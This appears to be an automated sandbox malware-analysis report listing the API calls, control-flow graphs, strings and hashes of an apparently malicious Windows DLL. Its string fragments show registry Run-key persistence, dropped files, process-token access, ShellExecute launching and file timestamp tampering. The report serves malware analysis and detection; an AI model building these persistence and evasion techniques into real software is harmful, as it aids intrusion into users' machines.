                                          • _memset.LIBCMT ref: 100038E3
                                          • wsprintfA.USER32 ref: 10003904
                                          • _memset.LIBCMT ref: 1000391B
                                            • Part of subcall function 100028B9: _memset.LIBCMT ref: 100028FF
                                            • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002911
                                            • Part of subcall function 100028B9: _memset.LIBCMT ref: 10002920
                                          • Sleep.KERNEL32(000003F2), ref: 10003967
                                          • Sleep.KERNEL32(000003F2), ref: 1000399A
                                          • Sleep.KERNEL32(000003F2), ref: 100039CD
                                          • __time64.LIBCMT ref: 100039DB
                                          • _memset.LIBCMT ref: 100039F9
                                          • _rand.LIBCMT ref: 10003A03
                                          • _memset.LIBCMT ref: 10003A32
                                          • _memset.LIBCMT ref: 10003A90
                                            • Part of subcall function 10009824: __EH_prolog3_GS.LIBCMT ref: 1000982E
                                            • Part of subcall function 10009824: wsprintfA.USER32 ref: 100098BD
                                            • Part of subcall function 10009824: OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 10009BF6
                                            • Part of subcall function 10002D6B: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002D87
                                            • Part of subcall function 10002D6B: GetFileSize.KERNEL32(00000000,00000000), ref: 10002D92
                                            • Part of subcall function 10002D6B: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002DAD
                                            • Part of subcall function 10002D6B: CloseHandle.KERNEL32(?), ref: 10002DCC
                                          • Sleep.KERNEL32(00000001), ref: 10003BB0
                                          • Sleep.KERNEL32(00000320), ref: 10003BB7
                                          • _memset.LIBCMT ref: 10003BD1
                                          • _mbstowcs.LIBCMT ref: 10003BEE
                                            • Part of subcall function 1000A77D: __mbstowcs_l_helper.LIBCMT ref: 1000A79D
                                          • _memset.LIBCMT ref: 10003C0F
                                          • _memset.LIBCMT ref: 10003C36
                                          • _strcat_s.LIBCMT ref: 10003C53
                                          • FindWindowExA.USER32(00000000,00000000,?,00000000), ref: 10003C66
                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000,000000FB), ref: 10003C93
                                          • GlobalAddAtomA.KERNEL32(?), ref: 10003E64
                                          • _memset.LIBCMT ref: 10003EDD
                                          • _memset.LIBCMT ref: 10003F5A
                                          • _memset.LIBCMT ref: 10003FBD
                                            • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001BCD
                                            • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001BEB
                                            • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001BF8
                                            • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 10001E65
                                            • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 10001E83
                                            • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10001E90
                                            • Part of subcall function 100018EA: OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 100020FD
                                            • Part of subcall function 100018EA: OpenProcessToken.ADVAPI32(?,000F01FF,?), ref: 1000211B
                                            • Part of subcall function 100018EA: CloseHandle.KERNEL32(?), ref: 10002128
                                            • Part of subcall function 10002388: __EH_prolog3_GS.LIBCMT ref: 10002392
                                            • Part of subcall function 10002388: CoInitializeEx.COMBASE(00000000,00000000), ref: 1000239B
                                            • Part of subcall function 10002388: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 100023AD
                                            • Part of subcall function 10002388: CoCreateInstance.COMBASE(100174F0,00000000,00000001,100172E0,?), ref: 100023C7
                                            • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023D4
                                            • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 100023F4
                                            • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 10002411
                                            • Part of subcall function 10002388: VariantInit.OLEAUT32(?), ref: 1000242E
                                          • _memset.LIBCMT ref: 10004329
                                          • LoadLibraryA.KERNEL32(?,?,00000000,000000F3), ref: 10004339
                                          • _memset.LIBCMT ref: 1000437A
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 1000438B
                                          • _memset.LIBCMT ref: 100043B7
                                          • ShellExecuteA.SHELL32(00000000,?,?,00000000,00000000,00000005,?,00000000,000000FA,?,?,?,?,00000000,000000F1), ref: 100043D4
                                          • Sleep.KERNEL32(000003E8,?,?,?,?,00000000,000000F1), ref: 100043E1
                                          • Sleep.KERNEL32(00000001,?,?,?,?,00000000,000000F1), ref: 100043E5
                                            • Part of subcall function 1000B46F: _doexit.LIBCMT ref: 1000B47B
                                          • RegOpenKeyExA.KERNEL32(80000001,10019800,00000000,000F003F,?), ref: 10004406
                                          • RegSetValueExA.KERNEL32(?,10019830,00000000,00000001,?,?,?,?,?,?,00000000,000000F1), ref: 10004438
                                          • RegCloseKey.KERNEL32(?,?,?,?,?,00000000,000000F1), ref: 10004444
                                          • Sleep.KERNEL32(000003E8), ref: 1000445A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _memset$Sleep$Open$Processwsprintf$Close$HandleInitVariant$FileToken_rand$CreateH_prolog3_Initialize__time64$AddressAtomDebugExecuteFindGlobalInstanceLibraryLoadOutputProcReadSecurityShellSizeStringValueWindow__mbstowcs_l_helper_doexit_mbstowcs_strcat_s
                                          • String ID: (x8$%s%s$%s%s$%s.e$.exe$0SafeMonClass$2.l$6)\$A$BkSha$C:\P$CU\SOF$G_SZ /d "$Open$Q36$Shel$Shel$TWARE\Mic$am F$cef.dll$cute$d "HK$dll$dowWndClass$dows\Curr$entVe$ft\Win$g.e$iles$l32.$lExe$lalala123%$le:///$mo /t RE$rogr$roso$rsion\R$t3d.$t4d.$t5d.$text/$tmp$tmp$tmp$un" /v de$xe
                                          • API String ID: 3410144617-526106949
                                          • Opcode ID: c005c4bdf768c1c0975766fb4753e8dca830afea233d1b36fbea20d03bb59d88
                                          • Instruction ID: 76413fe8cb11cab67de9982341d687c7d9ac36ac981408de7d88a9673e932c04
                                          • Opcode Fuzzy Hash: c005c4bdf768c1c0975766fb4753e8dca830afea233d1b36fbea20d03bb59d88
                                          • Instruction Fuzzy Hash: 2AA2CF7154C3C5AEE321DBA49845BABB7E9FFC4740F00482EF588CB291EAB1A944C757

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 420 10008a7e-10008ab1 421 10008ab3-10008ab5 call 10008215 420->421 422 10008aba-10008ac6 420->422 421->422 423 10008ad2-10008ad5 422->423 424 10008ac8-10008acd 422->424 427 10008ae4-10008ae9 423->427 428 10008ad7-10008ade call 10007c48 423->428 426 10008db4-10008dc2 call 1000a501 424->426 431 10008aeb-10008af7 call 10007c7d 427->431 432 10008aff-10008b1a call 1000839b 427->432 428->427 439 10008af9 431->439 440 10008b49-10008b54 432->440 441 10008b1c-10008b1e 432->441 439->432 442 10008b64-10008b66 440->442 443 10008b20-10008b22 441->443 444 10008b2e-10008b31 441->444 446 10008b56-10008b58 442->446 447 10008b68-10008b7f call 1000b61b 442->447 443->444 448 10008b24-10008b26 443->448 445 10008b3b-10008b44 call 10008930 444->445 445->426 452 10008b5a-10008b5c 446->452 453 10008b5e 446->453 458 10008b85 447->458 459 10008c1d-10008c30 447->459 449 10008b33-10008b3a 448->449 450 10008b28-10008b2c 448->450 449->445 450->444 450->449 452->453 456 10008b61-10008b62 452->456 453->456 456->442 460 10008b8c-10008c13 call 1000c4a0 * 2 call 1000b0dd call 1000ad20 458->460 461 10008c32-10008c39 459->461 462 10008c55-10008c80 call 1000a510 call 10008930 459->462 482 10008c82 460->482 483 10008c15-10008c1b 460->483 461->462 464 10008c3b-10008c42 461->464 473 10008cb0-10008cd6 CreateFileA 462->473 464->460 468 10008c48-10008c4f 464->468 468->460 468->462 476 10008ce2-10008cf6 call 10007e91 473->476 477 10008cd8-10008cdd 473->477 484 10008cf8-10008d03 call 1000b4c8 476->484 485 10008d09 476->485 477->426 487 10008c83-10008ca1 call 1000a510 call 10008930 482->487 483->487 484->485 486 10008d0f-10008d2f call 10007fea 485->486 494 10008dc5-10008dcf 486->494 495 10008d35-10008d37 486->495 500 10008ca6-10008cae 487->500 497 10008d71-10008d7f call 10008215 494->497 498 10008d67 495->498 499 10008d39 495->499 507 10008d81-10008d9c SetFileTime 497->507 508 10008da2-10008dae CloseHandle 497->508 498->497 501 10008d5a-10008d61 499->501 502 10008d3b-10008d58 WriteFile 499->502 500->473 501->497 505 10008d63-10008d65 501->505 502->501 504 10008dd1-10008ddb 502->504 504->497 505->486 505->498 507->508 508->426
                                          APIs
                                          • __fassign.LIBCMT ref: 10008B75
                                          • _memset.LIBCMT ref: 10008BA9
                                          • _memset.LIBCMT ref: 10008BCD
                                          • _strcat_s.LIBCMT ref: 10008BE8
                                          • _sprintf.LIBCMT ref: 10008C69
                                          • _sprintf.LIBCMT ref: 10008C91
                                          • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10008CC7
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10008D50
                                          • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 10008D9C
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 10008DA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                          • String ID: %s%s$:$\$text.e
                                          • API String ID: 3001508280-2720340845
                                          • Opcode ID: a50bfc6e1e061b7c5519877364b915e0a39f5f4d63e2ac600f096e2bcca3595d
                                          • Instruction ID: 2659727ae892349c9a1cc8126b4bdf09fa2e1e525e7c16959e2080c4e1c60f4a
                                          • Opcode Fuzzy Hash: a50bfc6e1e061b7c5519877364b915e0a39f5f4d63e2ac600f096e2bcca3595d
                                          • Instruction Fuzzy Hash: A591B171D00A289BFB61CA14CC85BDABBB8FB09395F1001D6E598A7185D770AFC5CF91

                                          Control-flow Graph

                                          APIs
                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10002C47
                                          • _memset.LIBCMT ref: 10002C70
                                          • Sleep.KERNEL32(00000001), ref: 10002C90
                                          • _malloc.LIBCMT ref: 10002CCA
                                          • _memset.LIBCMT ref: 10002CF7
                                          • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 10002D0F
                                          • _free.LIBCMT ref: 10002D16
                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10002D3E
                                          • FlushFileBuffers.KERNEL32(?), ref: 10002D4A
                                          • CloseHandle.KERNEL32(?), ref: 10002D56
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                          • String ID: cef.dll$lib
                                          • API String ID: 1923221151-1944707463
                                          • Opcode ID: a0f35e02025c0e6da95ad9ae4ad25ea50aa5c817dcbb148b28132c945581ed95
                                          • Instruction ID: 54aeca7516b8b968042b0eea4134454b72480e23f4a01d4031a2aafac840d857
                                          • Opcode Fuzzy Hash: a0f35e02025c0e6da95ad9ae4ad25ea50aa5c817dcbb148b28132c945581ed95
                                          • Instruction Fuzzy Hash: 0731827190022CAFEB15DF648C85FEEBBB9FB19354F0041D5F689A6150DAB19EC18F50

                                          Control-flow Graph

                                          APIs
                                          • _memset.LIBCMT ref: 100028FF
                                          • _memset.LIBCMT ref: 10002911
                                          • _memset.LIBCMT ref: 10002920
                                          • _memset.LIBCMT ref: 10002B15
                                          • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 10002BBF
                                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002BE6
                                          • FlushFileBuffers.KERNEL32(00000005), ref: 10002BF2
                                          • CloseHandle.KERNEL32(00000005), ref: 10002BFE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                          • String ID: <
                                          • API String ID: 2144675991-4251816714
                                          • Opcode ID: fc8d75bdc938032357b43d1f96daf97680519e251c9822e42b45c95b1a30f2ff
                                          • Instruction ID: 89ec0f64cc6022f2ef4fce1017900847434db0f7d38f987f34c33e9451b14973
                                          • Opcode Fuzzy Hash: fc8d75bdc938032357b43d1f96daf97680519e251c9822e42b45c95b1a30f2ff
                                          • Instruction Fuzzy Hash: F591A775900228AFEB219F64CC859EABBFDFB09395F14C1EAF509A2150DB319F858F50

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 589 10008930-1000894d 590 100089af-100089b3 589->590 591 1000894f-1000896a call 1000b61b 589->591 593 10008a70-10008a7d call 1000a501 590->593 594 100089b9-100089bc 590->594 599 1000896d-10008972 591->599 597 100089be-100089c0 594->597 600 100089c2-100089c4 597->600 601 100089c6 597->601 599->599 603 10008974-10008976 599->603 600->601 602 100089c8-100089cd 600->602 601->602 602->597 604 100089cf-100089d1 602->604 605 10008978-10008984 603->605 606 1000898e-1000899e GetFileAttributesA 603->606 607 100089d3-100089f8 call 10012e20 call 10008930 604->607 608 100089fb-10008a05 604->608 609 10008986-10008989 605->609 610 1000898b 605->610 606->590 611 100089a0-100089a9 CreateDirectoryA 606->611 607->608 613 10008a07-10008a19 call 1000b61b 608->613 614 10008a1c-10008a26 608->614 609->606 609->610 610->606 611->590 613->614 617 10008a29-10008a2e 614->617 617->617 620 10008a30-10008a5f call 1000b61b GetFileAttributesA 617->620 620->593 624 10008a61-10008a6a CreateDirectoryA 620->624 624->593
                                          APIs
                                          • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 10008995
                                          • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 100089A9
                                          • __fassign.LIBCMT ref: 1000895C
                                            • Part of subcall function 1000B61B: __mbsnbcpy_l.LIBCMT ref: 1000B62B
                                          • __fassign.LIBCMT ref: 10008A14
                                          • __fassign.LIBCMT ref: 10008A43
                                          • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 10008A56
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 10008A6A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                          • String ID:
                                          • API String ID: 2854908881-0
                                          • Opcode ID: 8b52cf0d2e92c66932e7fabede449ccba689fc108993b223d212572b34f61b1a
                                          • Instruction ID: 91c1e80bd56abd845fcbfb77fb78178165a6c206ea0fcbd970bcf73cc3f8dc49
                                          • Opcode Fuzzy Hash: 8b52cf0d2e92c66932e7fabede449ccba689fc108993b223d212572b34f61b1a
                                          • Instruction Fuzzy Hash: 56410B755042489AFB00DB68CC88BE977EDFB05380F5801E5E5D4D3186DB719F88CB52

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 625 10009824-1000987b call 10013a60 call 10009c60 630 10009880-10009886 625->630 631 1000987d 625->631 632 10009888 630->632 633 1000988b-1000989e call 10008ddd 630->633 631->630 632->633 636 100098a0-100098a6 633->636 637 100098ce-100098db 633->637 640 100098a8 636->640 641 100098ab-100098b1 636->641 638 100098e0-100098e3 637->638 639 100098dd 637->639 642 100098e5 638->642 643 1000990f-1000991f call 10008352 638->643 639->638 640->641 644 100098b3 641->644 645 100098b6-100098c9 wsprintfA 641->645 646 100098ef 642->646 643->646 655 10009921-10009933 call 10008e86 643->655 644->645 648 10009bed-10009bf0 645->648 649 100098f5-100098fd 646->649 651 10009bf2 648->651 652 10009bf5-10009c5f OutputDebugStringA call 10009d27 call 100052b8 call 100052f3 call 100052b8 * 5 call 10013aaa 648->652 653 10009bc1 call 1000972c 649->653 654 10009903-1000990a call 10008ef0 649->654 651->652 663 10009bc6-10009bcd 653->663 654->663 655->646 668 10009935-10009949 655->668 666 10009bd2-10009be9 wsprintfA 663->666 667 10009bcf 663->667 666->648 667->666 668->649 670 1000994b-1000997a call 1000afa4 call 10008e86 668->670 679 10009982-100099a8 call 1000976d 670->679 680 1000997c 670->680 686 10009bb7-10009bbc call 1000a1f1 679->686 687 100099ae-10009a73 call 1000518c call 10009c8a call 10009ce1 call 10009dc6 call 100052b8 call 10009ce1 call 10009dc6 call 100052b8 679->687 680->679 686->653 711 10009a75 687->711 712 10009a78-10009a7e 687->712 711->712 713 10009a80 712->713 714 10009a83-10009a87 712->714 713->714 715 10009aa3-10009aa5 714->715 716 10009a89-10009a8b 714->716 717 10009aa8-10009aaa 715->717 718 10009a8d-10009a93 716->718 719 10009a9f-10009aa1 716->719 720 10009ab0-10009ab3 717->720 721 10009b46-10009b72 call 100052b8 * 3 717->721 718->715 722 10009a95-10009a9d 718->722 719->717 720->721 723 10009ab9-10009abf 720->723 738 10009b80-10009bac 721->738 739 10009b74-10009b7f call 1000b09f 721->739 722->714 722->719 725 10009ac1 723->725 726 10009ac4-10009aed call 1000518c call 10009d5b 723->726 725->726 736 10009af2-10009af8 726->736 737 10009aef 726->737 742 10009afa 736->742 743 10009afd-10009b0a call 10008ec1 736->743 737->736 738->670 741 10009bb2 738->741 739->738 741->649 742->743 746 10009b0f-10009b13 743->746 747 10009b15-10009b1a 746->747 748 10009b38-10009b41 call 100052b8 746->748 747->748 749 10009b1c-10009b21 747->749 748->721 749->748 751 10009b23-10009b28 749->751 751->748 752 10009b2a-10009b2f 751->752 752->748 753 10009b31 752->753 753->748
                                          APIs
                                          • __EH_prolog3_GS.LIBCMT ref: 1000982E
                                          • wsprintfA.USER32 ref: 100098BD
                                          • wsprintfA.USER32 ref: 10009BE0
                                            • Part of subcall function 10008352: __fassign.LIBCMT ref: 10008365
                                          • _wprintf.LIBCMT ref: 1000995C
                                          • std::_Xinvalid_argument.LIBCPMT ref: 10009BBC
                                          • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10016B40,000000FF), ref: 10009BF6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                          • String ID:
                                          • API String ID: 2279894289-0
                                          • Opcode ID: 685f7fc147ffba85f4603d794481bf76331ea8b2d64d54bdca5866434efdc101
                                          • Instruction ID: 622278a19ea4e0f23fdf8b31d223e814ca222b5bb078937c9ab139d7dbdd0e1d
                                          • Opcode Fuzzy Hash: 685f7fc147ffba85f4603d794481bf76331ea8b2d64d54bdca5866434efdc101
                                          • Instruction Fuzzy Hash: 1EC15975D002699BEF22CFA4CC81ADDB7B8EF05390F5041AAE949A7245DB30AF85CF51

                                          Control-flow Graph

                                          APIs
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002D87
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 10002D92
                                            • Part of subcall function 1000A25F: _malloc.LIBCMT ref: 1000B4E2
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002DAD
                                          • CloseHandle.KERNEL32(?), ref: 10002DCC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$CloseCreateHandleReadSize_malloc
                                          • String ID:
                                          • API String ID: 1369180008-0
                                          • Opcode ID: d86be2d11198bb8b3d3548a2baccd8740581441c81fff3067ac5a97e511b0495
                                          • Instruction ID: b6e065022b967105a3a6c677f7e07d96cb23a3d5ec31f6699da48e5f37e9fbfa
                                          • Opcode Fuzzy Hash: d86be2d11198bb8b3d3548a2baccd8740581441c81fff3067ac5a97e511b0495
                                          • Instruction Fuzzy Hash: 8A11A575500224BAFB11AB71CC89EEF3F6DFF456D0F004125F909A6056DA70AD50C6F0

                                          Control-flow Graph

                                          APIs
                                          • _malloc.LIBCMT ref: 1000B4E2
                                            • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                            • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                            • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                          • std::exception::exception.LIBCMT ref: 1000B517
                                          • std::exception::exception.LIBCMT ref: 1000B531
                                          • __CxxThrowException@8.LIBCMT ref: 1000B542
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                          • String ID:
                                          • API String ID: 615853336-0
                                          • Opcode ID: fed967542a08c0061ac2f05d02469dd67cfdd1ec288f06afea94a4534caab2f9
                                          • Instruction ID: a75e7fbd331fdb54b571f695bf5094c90e00ed0fd4663d813d0828e10929f906
                                          • Opcode Fuzzy Hash: fed967542a08c0061ac2f05d02469dd67cfdd1ec288f06afea94a4534caab2f9
                                          • Instruction Fuzzy Hash: 01F02835400759ABFB50DF54CC46EAD3BBAFB013D0F60015AF815AA096CF74DE868740

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 898 10007e91-10007e9f 899 10007ea1 898->899 900 10007ea9-10007eac 898->900 901 10007ea3-10007ea4 899->901 900->899 902 10007eae-10007eb1 900->902 903 10007fe6-10007fe9 901->903 904 10007eb3-10007eb8 call 10008215 902->904 905 10007eba-10007ed1 call 10007cce 902->905 904->905 910 10007ed3-10007ed5 905->910 911 10007ed7-10007ee7 call 1000ac8b 905->911 910->901 914 10007f10-10007f13 911->914 915 10007ee9-10007f07 call 1000ac8b 911->915 916 10007fe5 914->916 919 10007f18-10007f42 915->919 920 10007f09-10007f0f call 1000ac51 915->920 916->903 922 10007f62-10007f7e 919->922 923 10007f44-10007f50 call 10007127 919->923 920->914 926 10007f80-10007f83 922->926 927 10007f85 922->927 928 10007f55-10007f59 923->928 929 10007f88-10007fbb 926->929 927->929 928->922 930 10007f5b 928->930 931 10007fd0-10007fe3 929->931 932 10007fbd-10007fc4 929->932 930->922 931->916 932->931 933 10007fc6-10007fce call 10006f1a 932->933 933->931 933->932
                                          APIs
                                          • _malloc.LIBCMT ref: 10007EDD
                                            • Part of subcall function 1000AC8B: __FF_MSGBANNER.LIBCMT ref: 1000ACA4
                                            • Part of subcall function 1000AC8B: __NMSG_WRITE.LIBCMT ref: 1000ACAB
                                            • Part of subcall function 1000AC8B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000ACD0
                                          • _malloc.LIBCMT ref: 10007EEE
                                          • _free.LIBCMT ref: 10007F0A
                                            • Part of subcall function 1000AC51: HeapFree.KERNEL32(00000000,00000000,?,1000A824,?,?,1000101C), ref: 1000AC67
                                            • Part of subcall function 1000AC51: GetLastError.KERNEL32(1000E0E6,?,1000EF73,00000000,1001C310,0000000C,1000EFAD,1000E0E6,?), ref: 1000AC79
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: Heap_malloc$AllocateErrorFreeLast_free
                                          • String ID:
                                          • API String ID: 916394080-0
                                          • Opcode ID: 60b11c1cfe0fbb3405eef0f7a633403ef12bcde8c2e364a545f5c540641d3538
                                          • Instruction ID: 5c4abcf3b0273c4115ce77ce56a80b6181141dfd5b40fb2f3c57c33d422fee36
                                          • Opcode Fuzzy Hash: 60b11c1cfe0fbb3405eef0f7a633403ef12bcde8c2e364a545f5c540641d3538
                                          • Instruction Fuzzy Hash: CB419C75A05656EFEB45CF68C4809A9BBF8FF08790B1001AAE858CB74AD734F950CBD0

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 936 10007777-10007790 call 100075d8 939 10007792-10007795 936->939 940 1000779a-1000779d 936->940 941 100078a4-100078a7 939->941 942 100077c0 940->942 943 1000779f-100077a3 940->943 944 100077c3 942->944 945 100077a5-100077b8 SetFilePointer 943->945 946 100077ba-100077be 943->946 947 100077c6-100077d3 944->947 945->944 946->947 948 100077d5 947->948 949 100077d8-100077ea call 1000ac8b 947->949 948->949 952 100077f4-100077fe 949->952 953 100077ec-100077ef 949->953 955 10007804 952->955 956 10007897-100078a2 call 1000ac51 952->956 954 100078a3 953->954 954->941 958 1000780e-1000781b 955->958 956->954 960 10007820-1000782c 958->960 961 1000781d 958->961 962 10007830-1000783e call 100075d8 960->962 963 1000782e 960->963 961->960 962->956 966 10007840-10007849 call 10007637 962->966 963->962 968 1000784e-10007854 966->968 968->956 969 10007856-10007859 968->969 970 1000787a-1000787c 969->970 971 1000785b-10007863 970->971 972 1000787e 970->972 971->970 973 10007865-1000786a 971->973 974 10007885-10007889 972->974 973->970 975 1000786c-10007871 973->975 974->956 976 1000788b-10007891 974->976 975->970 978 10007873-10007878 975->978 976->956 977 10007806-10007809 976->977 977->958 978->970 979 10007880-10007882 978->979 979->974
                                          APIs
                                            • Part of subcall function 100075D8: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,1000778E,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 10007604
                                          • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000001,?,00000000,?,?,?,100078E5,?,00000140,00000000,00000000), ref: 100077AF
                                          • _malloc.LIBCMT ref: 100077DF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: FilePointer$_malloc
                                          • String ID:
                                          • API String ID: 3040784002-0
                                          • Opcode ID: 28e1fefcf659a16470e03273281f6f5609ee5f1abf9c06588519510a91d29f85
                                          • Instruction ID: 1313e7d9f5820cc7ab2e201ac5c5f020cab07999e36477c17eb6c123f5e17d05
                                          • Opcode Fuzzy Hash: 28e1fefcf659a16470e03273281f6f5609ee5f1abf9c06588519510a91d29f85
                                          • Instruction Fuzzy Hash: 0B41A271E44246ABFB10DA68C848B9DBBF1FF043D4F25C169E909E7289EB78D940CB41

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 980 1000752c-10007559 CreateFileA 981 10007565-1000759f SetFilePointer call 1000b4c8 980->981 982 1000755b-10007563 980->982 986 100075a1-100075a8 SetFilePointer 981->986 987 100075ab-100075b2 981->987 983 100075b3-100075b6 982->983 986->987 987->983
                                          APIs
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000141,00000141,?,10008324,?,?), ref: 1000754D
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B85,?), ref: 10007571
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000020,?,10008E1B,?,00000004,10009892,?,?,00000334,10003B85,?), ref: 100075A6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2992649770.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10001000_N6xnw0iEGs.jbxd
                                          Similarity
                                          • API ID: File$Pointer$Create
                                          • String ID:
                                          • API String ID: 250661774-0
                                          • Opcode ID: 937e745b7458db1d1c02225848fbd8e50125f5581100b2d9b8b04083533d578e
                                          • Instruction ID: b1a7f2e70109716a175c2d37c51be133c3c27d8d5b2c45801dce53fe0fcebab3
                                          • Opcode Fuzzy Hash: 937e745b7458db1d1c02225848fbd8e50125f5581100b2d9b8b04083533d578e
